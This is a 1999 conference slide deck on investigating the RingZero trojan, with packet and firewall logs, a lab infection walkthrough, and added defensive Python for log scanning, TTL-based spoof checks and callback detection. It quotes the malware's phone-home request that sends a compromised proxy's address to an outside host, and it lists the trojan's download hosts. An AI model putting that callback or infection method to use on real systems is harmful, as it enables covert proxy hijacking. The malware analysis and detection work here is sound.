
The Hunt For RingZero



  1. The Hunt For RingZero
  John Green, jegreen@crosslink.net

  2. Outline
  • A word about Trojans
  • Getting a clue
  • Looking for data
  • How many source hosts?
  • The hunt for the Trojan
  • Game over
  • BoF Findings

  3. Trojans
  This is Roland's home computer, connected to an ISP.

  4. Trojans
  "Driving the Bus": NETBUS

  5. Deep Throat - 2140
  Two UDP probes to the Deep Throat port (2140), shown as tcpdump hex output:

  200.31.13.8 > 158.12.110.1.2140: udp 2
    4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01
    ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000
    0664 6f6e 616c

  200.31.13.8 > 158.12.110.2.2140: udp 2
    4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02
    ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000
    0331 3831 0231

  6. Trojans Review
  • The most well-known trojan programs are Netbus and Back Orifice
  • Protective tools include: all major anti-virus tools, Nuke Nabber, NFR's Back Officer Friendly and AtGuard

  7. Getting A Clue
  • Sept 19, 1999: Roland Grefer writes with an AtGuard detect from his home.com cable modem
  • We both commented that probes to TCP port 3128 are not that common

  8. AtGuard
  http://www.atguard.com

  9. More Clues
  • Sept 21, 1999: SHADOW analyst Adena Bushrod reports similar activity
  • Contact other organizations: MITRE, ARL
  • They see it too!

  10. Proxy Scanning
  The same source hits one host on 80, 8080 and 3128 a second apart (tcpdump output):

    08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
    08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
    08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)

  11. How Big Is This Thing?!
  "Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to info@sans.org with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!"
  BIG!

  12. Over 300 3128 Messages In Three Days
  Firewall log excerpt (fields: record;date;time;firewall;log;action;;interface;direction;proto;source;destination;dst port;src port;length;rule; site addresses sanitized as xxx.yyy):

    29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
    30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
    31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;
    32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;
    33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;
    34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;
    35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;
    36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;
    37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy.139.66;3128;2678;48;48;
    38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;
    39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;
    40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;

  Over 1000 Source Hosts!
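An added example, not from the talk: detection logic over log lines in the firewall format shown on slide 12, counting distinct source hosts that hit TCP/3128 and flagging sources that walk the 80, 8080, 3128 triplet of slide 10 against one destination. The log lines in the block are constructed (two copied from the slide, the rest modelled on its layout), and the field positions are an assumption read from the slide.

```python
"""Scan-pattern detection over RingZero-era firewall logs (added example).

Line layout assumed from slide 12:
record;date;time;firewall;log;action;;iface;direction;proto;src;dst;dport;sport;len;rule;
"""
from collections import defaultdict

# Constructed sample log: first two lines are from the slide, the rest are modelled on it.
# xxx.yyy is the sanitized site prefix used on the slide.
SAMPLE_LOG = """\
29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
40;23Sep1999; 8:58:35;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;80;1606;44;48;
41;23Sep1999; 8:58:36;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;8080;1607;44;48;
42;23Sep1999; 8:58:37;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;1609;44;48;
43;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;80;1089;44;25;
"""


def parse_line(line):
    """Return (src, dst, dport) for one log line, or None for non-TCP or malformed lines."""
    fields = [f.strip() for f in line.split(";")]
    if len(fields) < 14 or fields[9] != "tcp":
        return None
    return fields[10], fields[11], int(fields[12])


def sources_to_port(log, port=3128):
    """Distinct source hosts that sent anything to `port` (slide 12: 'over 1000 source hosts')."""
    return {rec[0] for rec in map(parse_line, log.splitlines()) if rec and rec[2] == port}


def proxy_scan_triplets(log, sequence=(80, 8080, 3128)):
    """Sources that probed one destination on 80, then 8080, then 3128, in that order."""
    seen = defaultdict(list)  # (src, dst) -> destination ports in log order
    for rec in map(parse_line, log.splitlines()):
        if rec:
            seen[(rec[0], rec[1])].append(rec[2])
    hits = set()
    for (src, _dst), ports in seen.items():
        it = iter(ports)  # `want in it` consumes the iterator, so this is an in-order subsequence test
        if all(want in it for want in sequence):
            hits.add(src)
    return hits
```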

  13. What Are The Possibilities? > 1000 Source Hosts
  • Spoofed
  • World's largest coordinated attack
  • Trojan software or "malware"

  14. Source Host Analysis
  "I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter."
  Judy Novak - ARL
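An added example, not from the talk, of the arriving-TTL plausibility check described above: the sender's initial TTL is assumed to be the smallest common OS default (32, 64, 128, 255) not below the observed value, the implied hop count is compared with a traceroute back to the source, and sources whose numbers disagree are flagged. The records and the tolerance are constructed for the example.

```python
"""TTL versus traceroute consistency check for suspected spoofed sources (added example)."""

# Common OS default initial TTLs, ascending; the guess is an assumption, not a certainty.
COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def infer_hops(observed_ttl):
    """Estimated hops from an arriving TTL, assuming a common default initial TTL."""
    for initial in COMMON_INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial - observed_ttl
    raise ValueError("TTL out of range: %r" % observed_ttl)


def ttl_consistent(observed_ttl, traceroute_hops, tolerance=3):
    """True when the TTL-implied hop count agrees with the reverse-path traceroute.

    Routing is often asymmetric, so the reverse path may differ by a hop or two;
    the tolerance absorbs that without masking a wildly wrong value.
    """
    return abs(infer_hops(observed_ttl) - traceroute_hops) <= tolerance


# Constructed records: (source, arriving TTL seen by tcpdump, hops on traceroute back).
RECORDS = [
    ("203.98.30.10", 113, 16),  # 128 - 113 = 15 hops implied, 16 seen: plausible
    ("196.15.173.2", 52, 13),   # 64 - 52 = 12 hops implied, 13 seen: plausible
    ("195.44.9.20", 240, 4),    # 255 - 240 = 15 hops implied, 4 seen: inconsistent
]


def spoof_suspects(records):
    """Sources whose arriving TTL does not fit the reverse-path hop count."""
    return [src for src, ttl, hops in records if not ttl_consistent(ttl, hops)]
```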

  15. The First Hot Tip - Sept 23
  "We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:"
  Anonymous

    get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pstmode=writeip&psthost=192.168.2.1&pstport=3128

  Later verified by four other sources.

  16. So What?
  "Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information."
  Anonymous

  17. Game Over?
  "I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code, specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call."
  Ron Marcum, Vanderbilt

  18. Extreme BoF - Decoding RingZero
  7PM - 2AM. My Thanks To All Involved!

  19. Basic Game Plan
  • Move the Vanderbilt files to a "safe" platform for examination
  • Use strings and other unix utilities to examine the files
  • Targeting mechanism was a primary interest

  20. Hour 1 - Gameplan Deviation
  • Strings, etc. didn't get us too far
  • RingZero uses Ian Luck's "Petite" program to compress the executables
  • Tim White volunteers to sacrifice his Windows laptop

  21. Hour 2 - Deliberate Infection
  • Created a mini-network: 2 computers, both running sniffers
  • Unzipped the archive
  • Two files: its.exe, pst.exe
  • Which to run first was a "coin-toss"

  22. Hour 3 - Examining ITS.EXE
  • Ran its.exe
  • It removed itself from the desktop
  • its.exe and Ring0.vxd placed in the \windows\system directory
  • Created an empty its.dat file
  • No network activity..... :(

  23. Traffic At Last!
  • After rebooting, the infected machine started doing DNS queries for hosts named:
    phzforum.virtualave.net
    xoom.members.com
  • Now we're getting somewhere!

  24. So What Now?
  • Created an entry in the infected machine's hosts file
  • Gave it the IP address of the sniffer
  • Infected machine started sending web requests on port 80

  25. Hours 4 and 5 - Reconfiguring the Sniffer Machine
  • Switched to Linux
  • Ran Apache and tcpdump
  • Apache logs showed that its.exe was trying to retrieve an its.dat file from the webservers:
    phzforum.virtualave.net/its.dat
    xoom.members.com/harmer/its.dat

  26. What Should Be In ITS.DAT?
  • its.dat no longer existed on phzforum.virtualave.net
  • Terminal room closed before we discovered the xoom.members.com connection
  • its.dat was found the following morning, but it is encrypted?

  27. Party Over? - Nope!
  • Getting very late
  • Oak Room closed
  • Remaining BoF members relocated to a corner, downstairs in LaSalle's

  28. Hours 6 and 7 - Running The PST.EXE File
  • Ran PST.EXE
  • Initial behavior was the same as its.exe: relocated itself, etc.
  • PST.EXE spewed packets to ports 80, 8080, and 3128!

  29. PST.EXE Behavior
  • Generated a small list of "random?" IP addresses
  • Scanned all IPs for port 80, then 8080, and finally 3128
  • Repeated

  30. What Is It Doing Though?
  • Since the scan was sequential, we were able to configure Apache "on-the-fly" to answer web requests for IPs in the scan.
  • Examining the Apache logs showed what we had hoped for:

  31. The End Game

    get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pstmode=writeip&psthost=192.168.2.1&pstport=3128

  The proxy is being used to send its own IP address and proxy port home to the "mothership"!
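An added example, not from the talk, for the request shape quoted on slides 15 and 31: a web server or proxy operator can pick the pst.pl "writeip" callback out of Apache access logs and recover the proxy address and port it reports, which is what the mothership learns. The access-log lines are constructed in Apache common log format, and the field names pstmode, psthost and pstport are taken from the quoted request.

```python
"""Find RingZero phone-home requests in an Apache access log (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed common-log-format lines; client addresses are sanitized placeholders.
ACCESS_LOG = """\
192.168.2.77 - - [23/Sep/1999:08:58:37 -0400] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl/?pstmode=writeip&psthost=192.168.2.1&pstport=3128 HTTP/1.0" 200 312
192.168.2.78 - - [23/Sep/1999:08:59:02 -0400] "GET /index.html HTTP/1.0" 200 1043
192.168.2.79 - - [23/Sep/1999:09:01:15 -0400] "GET http://www.rusftpsearch.net/cgi-bin/pst.pl/?pstmode=writeip&psthost=oops HTTP/1.0" 200 12
"""

# client, ident, user, [timestamp], "METHOD URI ..." : enough of the common log format for this check
REQ_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)')


def ringzero_callback(uri):
    """Return {'host': ip, 'port': n} if `uri` is a pst.pl writeip callback, else None."""
    parts = urlsplit(uri)
    if parts.netloc.lower() != "www.rusftpsearch.net":
        return None
    if not parts.path.startswith("/cgi-bin/pst.pl"):
        return None
    query = parse_qs(parts.query)
    if query.get("pstmode") != ["writeip"]:
        return None
    try:
        return {"host": query["psthost"][0], "port": int(query["pstport"][0])}
    except (KeyError, ValueError):
        return None  # malformed callback: worth logging separately, but never a crash


def scan_access_log(log):
    """(client, reported proxy host, reported proxy port) for every callback in the log."""
    found = []
    for line in log.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        cb = ringzero_callback(m.group("uri"))
        if cb:
            found.append((m.group("client"), cb["host"], cb["port"]))
    return found
```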

  32. Review of Findings
  • ITS.EXE attempts to retrieve files from various webservers
  • PST.EXE is the active scanner; it doesn't require the its.dat file to run
  • Discovered proxies send their IPs to www.rusftpsearch.net

  33. Questions Still Remain
  • Infection mechanism?
  • How does it start at boot time?
  • What is the its.dat file for? Targeting? Scan intensity dial? Attack configuration?

  34. Implications? Quantum leap in distributed attack technology
  • Viral infection rates
  • Configurable - its.dat
  • Scanning -> attacking?
  • Automatic result consolidation

  35. Thank you
